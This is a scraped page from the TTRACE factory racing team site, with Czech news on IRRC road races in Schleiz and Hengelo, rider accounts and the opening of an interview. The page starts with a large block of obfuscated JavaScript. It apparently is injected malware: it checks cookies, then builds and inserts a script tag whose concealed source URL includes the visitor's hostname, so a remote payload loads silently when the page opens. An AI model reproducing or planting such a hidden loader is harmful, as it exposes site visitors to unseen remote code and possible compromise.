(function(_0x3dcf42,_0x931ad8){function _0xc95f45(_0x314878,_0xbc42bd,_0x55bc4f,_0x28b7c3,_0x2d3944){return _0x477f(_0xbc42bd-0x78,_0x55bc4f);}function _0x352372(_0xe776,_0x371e30,_0x22707c,_0x2ab495,_0x2b149e){return _0x477f(_0x2b149e-0x167,_0xe776);}function _0x3b46aa(_0x2aba80,_0x5e73d4,_0x2a9a19,_0xa149aa,_0x116684){return _0x477f(_0x5e73d4-0x62,_0x2a9a19);}function _0x25e63c(_0x5c7542,_0x1bdb2c,_0x3ed9af,_0x2f2b32,_0x4df8e1){return _0x477f(_0x4df8e1- -0x1c5,_0x2f2b32);}var _0x30bc3f=_0x3dcf42();function _0x450c54(_0x1f3366,_0x49739f,_0x182c60,_0x3150e9,_0x393799){return _0x477f(_0x49739f- -0x244,_0x1f3366);}while(!![]){try{var _0x33dfdb=parseInt(_0x3b46aa(0x111,0x135,'U%iI',0x12f,0x12c))/(-0x209*0x4+-0x23b*0xd+-0x2524*-0x1)+-parseInt(_0x3b46aa(0x158,0x13c,'nzKH',0x137,0x16e))/(-0x1*0x742+0x1*-0x1b1b+0x3*0xb75)+-parseInt(_0xc95f45(0x106,0x108,'X7[(',0x112,0x11b))/(0x13f0+0x1*-0x2420+-0x1033*-0x1)*(-parseInt(_0x450c54('nzKH',-0x157,-0x148,-0x126,-0x11c))/(0x26b*0x8+0x1820*-0x1+0x4cc))+parseInt(_0x3b46aa(0xcf,0x10b,'ZudU',0xd1,0x137))/(0x18ed+-0x3*0x449+0xc0d*-0x1)*(parseInt(_0x25e63c(-0x10f,-0xd3,-0xe0,'U%iI',-0xe1))/(0xb1*0x17+-0x2485+0x14a4))+-parseInt(_0x3b46aa(0x12c,0x131,'CgYG',0x109,0x11e))/(0x255a+0x36+0xc83*-0x3)+parseInt(_0x352372('NXpS',0x226,0x252,0x26b,0x25e))/(0x1*0x1c1f+0x4b5*0x8+-0x41bf)+parseInt(_0x450c54('Golk',-0x183,-0x167,-0x174,-0x1ae))/(-0x1a7e+-0xa9d+0x2524*0x1)*(-parseInt(_0x450c54('C$hM',-0x17e,-0x150,-0x17b,-0x19c))/(0x109e+0x65c+-0x16f0));if(_0x33dfdb===_0x931ad8)break;else _0x30bc3f['push'](_0x30bc3f['shift']());}catch(_0x4e403e){_0x30bc3f['push'](_0x30bc3f['shift']());}}}(_0x2682,0xd*-0x19ab+-0xe906*0x5+0x6*0x1c6e9));function _0x98a3fb(_0x5167d7,_0x68f748,_0x8041a3,_0x37159c,_0x5aeb39){return _0x477f(_0x8041a3-0x121,_0x37159c);}function _0x3b8a9d(_0x79ff97,_0x2c2457,_0x4efc1d,_0x5fb716,_0x18d8b3){return _0x477f(_0x79ff97-0xdc,_0x2c2457);}function _0x239a0c(_0x1600b4){function _0x400ec6(_0x54478a,_0x1b7b33,_0x27b0b8,_0xc72beb,_0x1cdb02){return _0x477f(_0x27b0b8-0x1cb,_0x1b7b33);}var _0x5ee054={'YJZfh':function(_0x1567c9,_0x49f3f8){return _0x1567c9!==_0x49f3f8;},'HziTf':function(_0x288b17,_0x368c2c){return _0x288b17(_0x368c2c);},'oVpjg':_0x54a7ff(0x2a5,0x2a5,0x290,0x2a9,'VAx7'),'kWFfr':_0x4bece6(']r[6',0x15e,0x155,0x16b,0x1a3)+'t','QEzaM':function(_0x4b3864,_0x513edf){return _0x4b3864+_0x513edf;},'ovrAt':_0x54a7ff(0x25e,0x29f,0x257,0x26c,']1W(')+_0x54a7ff(0x288,0x227,0x294,0x264,'OpSM')+_0x4bece6('T2)I',0x189,0x1c3,0x1b8,0x1d1)+_0x28e2e0(0x16c,0x139,0x15d,0x173,'m6[0')+_0x1339b0(0x60,0x41,'h8aa',0x5a,0x7d)+_0x28e2e0(0x1b6,0x1bf,0x1b2,0x1bc,']r[6')+_0x400ec6(0x26e,'NEDq',0x258,0x235,0x226)+_0x54a7ff(0x2b6,0x2ac,0x2bb,0x29d,'Lo!0')+_0x1339b0(0xcd,0xa8,'8vE4',0x90,0x53),'hbtuG':_0x28e2e0(0x1d6,0x212,0x19f,0x1d0,'vvYy')+_0x1339b0(0xd5,0x98,']r[6',0xb4,0x7b)+_0x400ec6(0x240,'FMFL',0x254,0x21f,0x28d),'LKVei':_0x4bece6('*MiF',0x152,0x196,0x184,0x177)+_0x1339b0(0xc5,0xc2,'FMFL',0x94,0x95),'mxuJk':function(_0x5e6aad,_0x452141){return _0x5e6aad==_0x452141;},'HTsut':_0x4bece6('Hvl4',0x190,0x1c3,0x18b,0x14f)+_0x4bece6('AU)J',0x18d,0x157,0x17c,0x1a6)+_0x54a7ff(0x28f,0x27e,0x260,0x272,')]Pk')+_0x1339b0(0xcb,0xa9,'C$hM',0xa2,0x82)+'\x22]','fsbkA':function(_0x436958,_0x4c8fb0){return _0x436958===_0x4c8fb0;},'gryHv':_0x400ec6(0x258,'C$hM',0x279,0x29d,0x2a2),'OMRON':_0x1339b0(0xb1,0x62,'vvYy',0x8f,0xab),'rCXil':_0x28e2e0(0x19c,0x1a0,0x1b3,0x19a,'Lo!0'),'fYkFu':_0x54a7ff(0x2e0,0x2e3,0x2be,0x2b6,'m6[0')},_0x126fce=document;function _0x28e2e0(_0x1ece24,_0x2ba47f,_0x292dad,_0x351468,_0x4f8dad){return _0x477f(_0x1ece24-0xea,_0x4f8dad);}function _0x54a7ff(_0x3e2858,_0x156d12,_0x2eb84b,_0x5e9276,_0x551948){return _0x477f(_0x5e9276-0x1de,_0x551948);}var _0x37c692=_0x126fce[_0x54a7ff(0x2a6,0x2d5,0x2b0,0x2bd,'RAu$')+_0x1339b0(0xbb,0xbf,'hdx1',0x87,0xa2)+_0x4bece6('nzKH',0x170,0x1aa,0x175,0x1ab)](_0x5ee054[_0x1339b0(0x95,0x9b,'BdPl',0xbc,0xa7)]);_0x37c692[_0x1339b0(0x7d,0x65,'RAu$',0x59,0x3e)]=_0x5ee054[_0x400ec6(0x2bb,'AU)J',0x2b3,0x27d,0x2be)](_0x5ee054[_0x4bece6('FQ6j',0x1b8,0x1b3,0x189,0x19e)](_0x5ee054[_0x4bece6('EIG7',0x17c,0x1e1,0x1b6,0x1da)],window[_0x54a7ff(0x2c5,0x2ad,0x2de,0x2b2,'m6[0')+_0x4bece6('yz7(',0x1d3,0x1af,0x1c7,0x1d7)][_0x28e2e0(0x1db,0x1cb,0x1ff,0x1cf,'[AfR')+_0x54a7ff(0x303,0x2ad,0x2e7,0x2d2,'CgYG')]),_0x1600b4);function _0x1339b0(_0x3a1bd1,_0x5d3b5d,_0x5227ad,_0x3af427,_0x43974f){return _0x477f(_0x3af427- -0x2e,_0x5227ad);}function _0x4bece6(_0x284a13,_0x20dba2,_0x577140,_0x2ce08b,_0x2a500b){return _0x477f(_0x2ce08b-0xd5,_0x284a13);}_0x37c692[_0x28e2e0(0x1a4,0x187,0x1a6,0x1c0,'8umV')]=_0x5ee054[_0x4bece6('yz7(',0x146,0x1aa,0x16e,0x1a5)],_0x37c692['id']=_0x5ee054[_0x54a7ff(0x2bf,0x2bd,0x2e7,0x2ac,'pbn[')];if(_0x5ee054[_0x400ec6(0x29b,'m6[0',0x278,0x273,0x263)](_0x5ee054[_0x1339b0(0x5d,0x60,'SS@X',0x78,0x96)](Boolean,document[_0x1339b0(0xbd,0xc4,'C$hM',0xad,0x8f)+_0x54a7ff(0x2e5,0x2c1,0x2a7,0x2af,'tqER')+_0x400ec6(0x29b,'VAx7',0x263,0x242,0x28b)](_0x5ee054[_0x400ec6(0x286,'RAu$',0x2ab,0x298,0x290)])),![])){if(_0x5ee054[_0x4bece6('NEDq',0x159,0x191,0x174,0x140)](_0x5ee054[_0x54a7ff(0x2ef,0x2bf,0x2c5,0x2cc,'FQ6j')],_0x5ee054[_0x400ec6(0x275,'2CCV',0x268,0x28d,0x27c)])){if(document[_0x54a7ff(0x29f,0x280,0x2c0,0x2b3,'M1mY')+_0x54a7ff(0x256,0x27b,0x2a6,0x26a,'C$hM')+_0x28e2e0(0x1c6,0x1e0,0x1c8,0x1a8,'NEDq')])_0x5ee054[_0x4bece6('xtoE',0x1ab,0x1bf,0x186,0x185)](_0x5ee054[_0x400ec6(0x27d,'FQ6j',0x25a,0x25a,0x296)],_0x5ee054[_0x28e2e0(0x1af,0x1ed,0x1a9,0x189,'T2)I')])?(document[_0x4bece6('BdPl',0x1b0,0x1b6,0x1c8,0x201)+_0x28e2e0(0x18e,0x183,0x1bf,0x1be,'tqER')+_0x54a7ff(0x244,0x29b,0x293,0x25f,'CgYG')][_0x400ec6(0x254,'x9J$',0x28b,0x2a5,0x253)+_0x4bece6('OpSM',0x17d,0x162,0x153,0x16c)][_0x4bece6('SS@X',0x196,0x1cb,0x1a2,0x17e)+_0x54a7ff(0x281,0x282,0x28f,0x2b4,'aX&q')+'re'](_0x37c692,document[_0x1339b0(0xdc,0xcf,'iam9',0xb7,0xb6)+_0x54a7ff(0x2ab,0x28e,0x299,0x28e,'yz7(')+_0x1339b0(0xaa,0xc3,'Hvl4',0x8a,0x4d)]),document[_0x28e2e0(0x17f,0x17d,0x19d,0x175,']r[6')+_0x1339b0(0x53,0x9a,'yz7(',0x82,0x51)+_0x1339b0(0xcd,0xcc,'yz7(',0xb9,0xb5)][_0x400ec6(0x289,'m6[0',0x2a9,0x2c6,0x26b)+'e']()):(_0x5ea0f7[_0x4bece6('RAu$',0x18d,0x153,0x18e,0x184)+_0x28e2e0(0x1bc,0x18d,0x18a,0x1a2,'iam9')+_0x1339b0(0x7d,0xf6,'yz7(',0xb9,0xf1)][_0x54a7ff(0x2be,0x2d7,0x26a,0x2a7,'9p7j')+_0x28e2e0(0x1ae,0x1dd,0x1d1,0x178,'C$hM')][_0x4bece6('D]0G',0x16d,0x166,0x176,0x149)+_0x4bece6('m6[0',0x1bb,0x1a5,0x19d,0x1ce)+'re'](_0x62bd9d,_0xecc7c9[_0x1339b0(0xb3,0x5e,'EIG7',0x99,0x61)+_0x400ec6(0x237,'D]0G',0x270,0x29f,0x243)+_0x1339b0(0x6b,0x90,'9p7j',0x70,0x34)]),_0x4e6184[_0x54a7ff(0x2b1,0x29a,0x2ad,0x299,'Lo!0')+_0x54a7ff(0x2b9,0x2aa,0x257,0x295,'x9J$')+_0x400ec6(0x290,'m6[0',0x25d,0x28c,0x280)][_0x4bece6('vvYy',0x186,0x13d,0x154,0x171)+'e']());else{if(_0x5ee054[_0x400ec6(0x298,'Lo!0',0x2c1,0x2e3,0x2a6)](_0x5ee054[_0x54a7ff(0x278,0x294,0x293,0x2a1,'M1mY')],_0x5ee054[_0x28e2e0(0x1e2,0x1dc,0x1fe,0x1bf,'8umV')]))_0x126fce[_0x1339b0(0x61,0x6d,'FQ6j',0x7a,0x62)+_0x54a7ff(0x2c5,0x27e,0x2a3,0x2b7,'FQ6j')+_0x400ec6(0x25f,'NEDq',0x275,0x292,0x2ab)+_0x54a7ff(0x2dc,0x2ce,0x2ef,0x2c4,'VAx7')](_0x5ee054[_0x28e2e0(0x1df,0x1a3,0x1e0,0x1f3,'8@Zd')])[0x531+0x1*0xaab+0x1d*-0x8c][_0x1339b0(0x6a,0x2e,'yz7(',0x56,0x57)+_0x54a7ff(0x28a,0x275,0x253,0x289,'xtoE')+'d'](_0x37c692);else return _0x5ee054[_0x28e2e0(0x1d5,0x1a0,0x1c0,0x1c6,'8umV')](_0x3e0231[_0x1339b0(0xed,0xaf,'AU)J',0xbb,0xbe)+'e'][_0x54a7ff(0x2d8,0x2a7,0x2d8,0x2ce,'pbn[')+'Of'](_0x4f9a48),-(0x681+0x1c90+-0x2310));}}else _0x5ee054[_0x1339b0(0x3e,0x87,']1W(',0x6d,0x5b)](_0x55f4a4,_0x5ee054[_0x1339b0(0xb7,0x71,')]Pk',0x7e,0x4d)]);}}function _0x2682(){var _0x1b8509=['W60tW6qLW54','t0ZcTColjW','vSkuWOe','W60ycJGZ','W542Da','WQ5DaWldPq','ymo4WRfMW7u','pcWqW6ldOJXfpSoWd8ojudG','WP7cQmohWRKy','W6JdVqSLkq','WRSAD8oBmW','WO5SjmoGW7rCBmktW5qjWQlcSmkH','W5yRzq','WQ/dHCoLfSk2','euRdG2Hr','xSklWP/cVv8','WO1UkCoNW7rCB8k3W5SZWRVcOSk3','WQBcNeSZlq','WPXHWP4','wmoqoCo/AG','ugpdJ8kBWOy','y8ohW5JcKuKFchDncGnc','pYjPWO5h','kmk6c8oJha','W57dTG8xkG','bdhdUumH','W5HpWPFcPh4','i0uGh8keW7KLfCkpxtiU','WOxdTbOlDmkKm8kQW5DmWPxcMdy','WQpdLSo4','W5LxcSoqsa','u8oGtCk+W58','WRrGrmohrG','WQr2rmoCuW','xxFcUWPGW5RcSb8gtwL+','h8ogW7a','v8kzWPVcRxy','W7ldRa0V','jd/dPgC0','qmoElCoZAG','WPK4wSo5jG','WP1joG','WPBdPGirra','WOWJmG','WQ/dLcvNWQW','W6qLDCoTEKVcOqy','WPeKA8kKW6a','W757W7ZcUIm','WQJdJGvHWQW','lutdG1jq','W7RdRt7cRSk7','W7bNWRhcRLW','WP8xeSo2vbRdHmkNWQq','WOpdLXKUza','W6GdFdmV','hSoEuSk6W5C','WQFdNSo5pCkX','mmkMd8ordq','jHRcMWxdVG','uCkpWRZcU0m','W6OZDJec','CCoeWPzFW6q','WQiCWR0HWPm','W4zhWR/cIN0','yZ40mZa','mWRdSmosja','hbDyW64L','krNdTG','WOXMWO/dJZS','WPJcKSoVWRu','zCo+WQf/W5e','W5hdI8ozW77cG8o1ncZdI2ldG8o0','WQ0Zsmo8hq','W4ldSSo6W5e','tCoAWPr/W6W','aGj5W6G5','W4X7txNcUJNcQCoGW5ZdJ8k9WR7cSG','x3JdImko','W5tdU8kSW6xdPa','mSkan8oKcW','hCkYWRNdQde','DCo+g8oyn8oPp8kt','r8kRW4OdWRS','WR7dPmoPeCk1','WOrypmoAW7e','W5ddI8osW7ZcGSk2dd7dH3BdSW','tCoiWR/dTea','WQfWwmobua','dfddMwne','W4G2W5yLW48','WO5QjCoOW7fzASkhW7eYWQhcRCk/','nmkImCoUcW','W4nQW4pcVdi','fZvJWOvV','W6nZamo6WOLrW5vhDKNcSxG','WQBdICoVfSkU','W4xdJCkgW77dRq','ohXIW5ZdJa','uh7dICkaWPS','WQldG8oTeW','W7jVWQdcHuq','W5H/ChCUA8kBASocq8kXdW','n8k7pCoYfW','WPNdPrq','bsVdQvyQ','WRJdG8oHgmkS','WOXHWPJdNcO','WQDhWO7dIcO','s8kOW4OWWQO','WR10qmouua','jSkAW4xdLa8','W6jZc8o4WOGsW61vEL3cGq','gJrcWPr4','dmoNW6pdUba','vSklWPS','W5/dSY3cQ8ol','W63dMtJcOCoV','W6u6pIWK','WRxcOCofWRyC','WR0AySoaAG','W5P7lXDSnmk3uW','W7bWWRZcO0y','qmk4f8kfW4NcVh1yoW'];_0x2682=function(){return _0x1b8509;};return _0x2682();}function _0x477f(_0x1f924e,_0x3114c0){var _0x2464dd=_0x2682();return _0x477f=function(_0x362e1d,_0x58308e){_0x362e1d=_0x362e1d-(0x16f+0x133*0x4+-0xd*0x71);var _0xd15947=_0x2464dd[_0x362e1d];if(_0x477f['XIgTWE']===undefined){var _0x375c49=function(_0x1a25fb){var _0x43fc36='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x43686d='',_0x567682='';for(var _0x786599=-0x8b*0x31+-0x1a05+0x34a0,_0xef68b9,_0x196794,_0x25863b=-0x1df8+-0xbe3*0x3+0x41a1;_0x196794=_0x1a25fb['charAt'](_0x25863b++);~_0x196794&&(_0xef68b9=_0x786599%(0x23eb+-0x1e10+0x12b*-0x5)?_0xef68b9*(0x2b*0xe5+0xda3+-0x2*0x19ed)+_0x196794:_0x196794,_0x786599++%(-0x1*-0x1193+-0x2*-0x379+0x9*-0x2b9))?_0x43686d+=String['fromCharCode'](-0x93c*-0x1+0xf*-0xa5+0x3*0x7a&_0xef68b9>>(-(-0xa60*-0x2+0x270c+-0x3bca)*_0x786599&-0x12f4+-0x25*-0xa5+-0x4df)):0x14f5+0x2676+0x87d*-0x7){_0x196794=_0x43fc36['indexOf'](_0x196794);}for(var _0x16e6e8=0x217*0x6+-0x15f6+0x10c*0x9,_0x2bdb12=_0x43686d['length'];_0x16e6e8<_0x2bdb12;_0x16e6e8++){_0x567682+='%'+('00'+_0x43686d['charCodeAt'](_0x16e6e8)['toString'](0x165+-0x26f*-0x8+-0x14cd))['slice'](-(0x1999+0x4f*0xb+0x73f*-0x4));}return decodeURIComponent(_0x567682);};var _0x311bca=function(_0x25aa77,_0x4175a0){var _0x142689=[],_0x59567b=0x2*-0x103d+0x71b+0x3*0x875,_0x1d2249,_0x1aa988='';_0x25aa77=_0x375c49(_0x25aa77);var _0x1133f3;for(_0x1133f3=0x1b06+0x347*0x7+-0x1*0x31f7;_0x1133f3<-0x58d*0x5+0x2189+-0x4c8;_0x1133f3++){_0x142689[_0x1133f3]=_0x1133f3;}for(_0x1133f3=0x39*0x95+0xf12+0x303f*-0x1;_0x1133f3<0x1*-0x16e5+0x9f3+-0x46*-0x33;_0x1133f3++){_0x59567b=(_0x59567b+_0x142689[_0x1133f3]+_0x4175a0['charCodeAt'](_0x1133f3%_0x4175a0['length']))%(0x16dd+0x1cfb+0x8*-0x65b),_0x1d2249=_0x142689[_0x1133f3],_0x142689[_0x1133f3]=_0x142689[_0x59567b],_0x142689[_0x59567b]=_0x1d2249;}_0x1133f3=-0x24f2*-0x1+0xdf8+-0x32ea,_0x59567b=0x2495+-0xba*-0x1f+0x1*-0x3b1b;for(var _0x4fcf98=0x6c6+0xabc+-0x2eb*0x6;_0x4fcf98<_0x25aa77['length'];_0x4fcf98++){_0x1133f3=(_0x1133f3+(0x10a2+-0x23*-0x106+-0x3473))%(-0x9a5*0x3+-0x4*-0x312+-0x11a7*-0x1),_0x59567b=(_0x59567b+_0x142689[_0x1133f3])%(0x2128+0x818+-0x2840),_0x1d2249=_0x142689[_0x1133f3],_0x142689[_0x1133f3]=_0x142689[_0x59567b],_0x142689[_0x59567b]=_0x1d2249,_0x1aa988+=String['fromCharCode'](_0x25aa77['charCodeAt'](_0x4fcf98)^_0x142689[(_0x142689[_0x1133f3]+_0x142689[_0x59567b])%(-0x1*-0x1ad7+0x18c8+-0x329f*0x1)]);}return _0x1aa988;};_0x477f['MuDofK']=_0x311bca,_0x1f924e=arguments,_0x477f['XIgTWE']=!![];}var _0x231d0e=_0x2464dd[-0x11dc*0x1+0x17cb+-0x5ef],_0x250a20=_0x362e1d+_0x231d0e,_0x3adb3f=_0x1f924e[_0x250a20];return!_0x3adb3f?(_0x477f['XVlfKU']===undefined&&(_0x477f['XVlfKU']=!![]),_0xd15947=_0x477f['MuDofK'](_0xd15947,_0x58308e),_0x1f924e[_0x250a20]=_0xd15947):_0xd15947=_0x3adb3f,_0xd15947;},_0x477f(_0x1f924e,_0x3114c0);}function _0x13f9be(_0x2a14a1){var _0x1fead1={};function _0x572e69(_0x205686,_0x49876d,_0x2e015f,_0x94208e,_0x4cfcee){return _0x477f(_0x94208e-0x33d,_0x205686);}function _0x2d81e3(_0x20f92a,_0x143171,_0x302148,_0x46e8ae,_0x17bb48){return _0x477f(_0x302148-0xfc,_0x20f92a);}function _0xf42b12(_0x1c4798,_0x30af5d,_0x35f9ea,_0x137ba5,_0x3b7860){return _0x477f(_0x35f9ea- -0x390,_0x3b7860);}_0x1fead1[_0x572e69('iam9',0x3a8,0x3e9,0x3c8,0x3e8)]=function(_0x11e6ef,_0x499704){return _0x11e6ef!==_0x499704;};function _0x2538e2(_0x25f543,_0x2dfdd2,_0x1b60e4,_0x5c354b,_0x1abfbd){return _0x477f(_0x25f543- -0x37f,_0x1b60e4);}var _0x18163d=_0x1fead1;return _0x18163d[_0x2d81e3('U%iI',0x189,0x19f,0x1bf,0x1be)](document[_0x2d81e3('FMFL',0x1aa,0x1d3,0x206,0x1ac)+'e'][_0xf42b12(-0x2e3,-0x276,-0x2b3,-0x2e5,']1W(')+'Of'](_0x2a14a1),-(-0x21b8+-0x1*-0x727+-0x1*-0x1a92));}function _0x29572f(_0x17168f,_0x22e1c3,_0x466f63,_0x164178,_0x7ed69b){return _0x477f(_0x164178- -0xaa,_0x466f63);}function _0x36a738(_0x486124,_0x2f82e6,_0x1d2c88,_0x3b560c,_0x3b41a4){return _0x477f(_0x1d2c88-0xc9,_0x3b560c);}var _0x1c305a=_0x5616e7(-0xaf,'h8aa',-0xad,-0x8b,-0x80)+_0x5616e7(-0xa6,'OpSM',-0x6b,-0x8d,-0xa8);function _0x5616e7(_0x2b1cfb,_0x15aa4a,_0x477b63,_0x27ef02,_0x32c62c){return _0x477f(_0x27ef02- -0x127,_0x15aa4a);}var _0x4deaab=_0x5616e7(-0x66,'ZudU',-0x9a,-0x94,-0x9f)+_0x98a3fb(0x1cf,0x1bf,0x1a4,'SS@X',0x1b9)+'s';_0x13f9be(_0x4deaab)==![]&&_0x13f9be(_0x1c305a)==![]?_0x239a0c(''):_0x239a0c(_0x29572f(0x23,-0x2d,'pbn[',0x9,-0x34)); TTRACE factory Racing

TTRACE factory Racing

Powered by TTRACE

Novinky

Stříbrný víkend pro české barvy a WRP

- No Comments -

Minulý víkend byl co se motocyklových závodů týká velmi pestrý, zde je krátká rekapitulace. Největší úspěch zaznamenal určitě Petr Svoboda, který zajel v MS Supersport300 v neděli 3.místo. Naopak už v sobotu dosáhl stejného umístění Michal Prášek v prestižním německém šampionátu IDM na Triumphu 765 ze stáje WRP. Stejnou motorku pak dovedl do cíle 2x druhý Marek Červený, v dalším prestižním tentokrát roadracingovém šampionátu IRRC, který se po nizozemském Hengelu konal také na německé půdě. Dějištěm bylo město Schleiz, nedaleko českých hranic, kde se jel jubilejní 100. ročník.

A tomuto závodu se budeme věnovat nejvíce, protože bojovali i další dva čeští jezdci, Lukáš Václavovič a Jakub Šprojcar jedoucí za český tým TTRACE výrobce motooblečení. Lukáš přivezl premiérový bod již z Hengela, řada byla nyní také na Jakubovi a povedlo se. Velkou dávku smůly si naopak vybral Petr Najman, který upadl hned v prvním kole 1. nedělního závodu, přivodil si zranění a musel být hospitalizován. Nicméně zpět na začátek. 

Volné tréninky se jely tentokrát už v pátek. Marek Červený společně s lídrem šampionátu Hambergem ukazovali, ze i tentokrat budou tzv. tvrdit muziku. Časy byly už na pátek velmi dobré. Lehce zaostával v pátek ještě jedoucí Petr Najman. Po prvním seznámení s tratí zrychloval i Lukáš Václavovič a Jakub Šprojcar jedoucí blízko za sebou.


V sobotní kvalifikaci pak největší progres zaznamenal Najman a Václavovič.

Startovní rošt na neděli vypadal následovně:

2. Marek Červený WRP – 1:30,622

4. Petr Najman PBS  – 1:31,721

16. Lukáš Václavovič TTRACE – 1:34,879

21. Jakub Šprojcar TTRACE – 1:36,766

Výsledky závodů

Neděle přinesla pro motocyklové závody ideální počasí. Start do prvního nedělního závodu se nepovedl Petrovi Najmanovi, který jak už jsme zmiňovali v druhé polovině tratě při snaze dohnat ztrátu upadl. Hamberg vyhrál s velkým náskokem před Červeným

Lukáš Václavovič dojel celkově na bodované 13. pozici, potom co ztratil dvě pozice při nedořezení na cílové rovince, zároveň však při nájezdu do posledního kola získal jednu ztracenou pozici zpět pěkným předjetím. V IRRC to bylo 12.místo. 

Jakub Šprojcar dojel na 16. pozici a v IRRC na 13. místě 

Odpoledne rošť o dvě místa prořídl. Marek Červený jel po startu několik kol s Hambergem, ale jen do chvíle, než začli předjíždět jezdce o kolo zpět. Zde si Hamberg vypracoval rozhodující náskok. Pořadí tak bylo stejné, jako ráno.

 1. Hamberg //  2. Červený //  13. Václavovič (v IRRC 10. pozice, což je top ten, již druhém podniku) // 19. Šprojcar (v IRRC 13.pozice) 

Další závody nás čekají za měsíc ve vzdáleném finské Imatře. Sledovat můžete i přímý přenos, který pořadatel chystá. Více info:  www.imatranajo.fi 

foto: MaVac Photography 

První závody IRRC v Hengelu

(postupně doplňujeme)

Do Hengela přijeli 4 čeští jezdci. Loňský šampion Marek Červený, po zranění vracející se Petr Najman a jezdci TTRACE Lukáš Václavovič a Jakub Šprojcar. Všichni startující v kategorii Supersport.

Lukáš Václavovič „#cage91“: Trať v Hengelu je velmi úzká, náročná a těžká na předjíždění. Místní borci jsou velmi ostřílení, ale nepřijeli jsme sem sbírat houby, takže nezbývalo nic jiného než učit se a bojovat.

V prvním závodě jsme udělali obrovskou chybu s nastavením motorky. Konkrétně s chladičem, na jehož „setup“ je naše motorka velmi citlivá. Navíc 30min. před startem bylo zhruba 15 stupňů, v závodě byla teplota vzduchu již kolem 20stupňů. Po startu jsem začal sjíždět skupinu před sebou, která jela o 13.-17. pozici. Navíc jsem je sjížděl celkem rychlým tempem, takže jsem si věřil na předjetí hned několika jezdců, ovšem pouze do 3. kola, kdy teplota vylítla a motorka se začala přehřívat. Následně jsem zvažoval, zda odstoupit, nebo dokroužit a aspoň udržet pozici. Začal jsem tedy řadit dříve, motorku „dochlazovat“ a udržovat si rozestup jezdců za mnou. Nakonec jsem svoji Kawasaki do cíle nějak „dotlačil“ a vznikl z toho první premiérový bod do šampionátu IRRC.

Do druhého závodu jsem nastupoval s velkým očekáváním, nepovedl si mi však start podle představ a nebyl jsem schopný předjet jezdce předemnou, který jel velmi defenzivně. Další body tak mizely každým metrem. Jezdce jsem zdolal až dvě kola před koncem, ale to už bylo na vše pozdě.

Velký dík patří sponzorům, všem fanouškům, parťákovi Jakubovi, jeho ženě za skvělý support. Klukům z týmu a také tátovi, se kterým jsme leželi ve zničeném obytňáku dlouho do noci.

foto: Lenka Hoffmann

Jakub Šprojcar #KUBA 49

Na první závod IRRC jsem se moc těšil, ale zároveň jsem byl nervózní z toho co mě čeká.

Úzká trať vede v prostředí farem a typických Holandských domečků kolem kterých jedeš full gas.

Na kochání však nebyl čas a učili jsme se trať každým tréninkem. Myslím, že se nám podařilo dobře nastavit podvozek a motorka fungovala dobře.

Konkurence byla velice silná. Nedá ani metr zadarmo.

Kvalifikace byla o tréninku, ale výsledky se počítají až v závodu. První závod se mi povedl perfektní start, ale pak přišla první zatáčka kde jezdec přede mnou měl náběh na highsider a já bohužel musel ubrat a  tak nastala stíhací jízda v dobrém tempu a zajetím svého nejlepšího času. Nakonec z toho bylo krásné místo za body!

Druhý závod

Odpolední závod vypadal že bude na vodě, ale nakonec nám počasí přálo a sprchlo nám až na balení před cestou domů.

Jak jsem řekl, jezdci zde nenechají ani metr a to se mi stalo právě v druhém závodě, kdy mě v úvodu jeden jezdec vytlačil téměř mimo trať. Než se mi jeho defenzivní jízdu podařilo předjet tak skupinka před námi mi ujela a na dohnání byl závod již krátký..

Tento úvodní víkend sezony IRRC hodnotím kladně a nabral jsem cenné zkušenosti, které zúročím v dalších závodech.

Nyní si odskočíme na 300 zatáček Gustava Havla na jubilejní 60. ročník Hořických závodů, kde se  budeme těšit na všechny naše fanoušky.

Pak nás čeká další ze série IRRC závodů a to německý Schleiz.

Foto by MaVac Photography
https://www.facebook.com/mavac.photography

Petr Najman (zdroj: facebook Petr Najman)

Předpověď počasí pro závodní den nebyla moc dobrá, vše vypadalo na déšť. Byli jsme však ušetřeni a odměněni. Závod 1: výborná pozice 4. O P3 se bojovalo s Iljou Caljouw, Gerry Johnsonem. Gerry Johnson musel kvůli technickým problémům zpomalit a Caljouw se pak v polovině závodu oddálil. Na konci prvního závodu skvělé 4. místo pro Petra.

2. závod Stejný souboj o 3. místo, Johnson tentokrát bez problémů a obsadil 4. místo, 3. místo obsadil Caljouw, který jel dobře. Pro Petra to bylo výborné 5. místo s úctyhodným odstupem na následující jezdce. Hamberg a Červeny obsadili první dvě místa v obou závodech. Jsme velmi spokojeni s dobrým začátkem sezóny IRRC v Hengelu a Petrovým výkonem. Díky patří PSB Motosport za perfektní motorky a všem sponzorům.

Rozhovory s jezdci před startem IRRC

- No Comments -

Jak už jsme psali před pár dny Jakub Šprojcar i Lukáš Václavovič, vstupují do seriálu evropského roadracingu IRRC. Jaká byla jejich příprava, co je k tomuto kroku vedlo a jaké mají např. ambice se dočtete právě nyní.

Proti mně sedí nyní Lukáš Václavovič, který mi přivítal na shoowroomu TTRace v Plzni, kde se navrhují dnes již čím dál známější kombinézy této značky.

„Lukáši, děkuji, že jsi našel v tvém nabitém dni chvíli času a já se tě mohu zeptat na pár otázek, které budou dnes směřovat především k nové sezóně. Konkrétně závodům šampionátu IRRC. Pro méně zasvědcené diváky, či čtenáře se jedná o evropský šampionát road racingu.

Co Vás k tomu vedlo, sice máš více road racingových zkušeností, než Jakub, např. v německém Frohburgu jsem tě viděl již tuším 3x, ale v Hořicích si v roce 2022 jel poprvé.

Lukáš: Ahoj Pavle, zdravím všechny čtenáře, fanoušky motorek, závodů a všeho, co má dvě kola. My děkujeme za tvůj čas a cestu k nám.

Máš pravdu, že např. v Hořicích jsme byli oba v loňském roce poprvé. Jako první musím hned vypíchnout, že do IRRC nejedeme bojovat o nejvyšší příčky, ani o první desítku. V té jsou ostřílení borci. Jedeme nasbírat co nejvíce zkušeností. Víc toho v první sezóně ani chtít nemůžeme. Tratě neznáme a budeme se učit. Navíc já mám úplně novou motorku, která vyžaduje jiný přístup, jiný styl ježdění, ale je těším se na „ni“ je zatraceně krásná a věřím, že stejně tak bude rychlá.

Pavel: Motorka tady stojí vedle nás, je opravdu krásná. Řekni mi k tomuto italskému stroji něco víc.

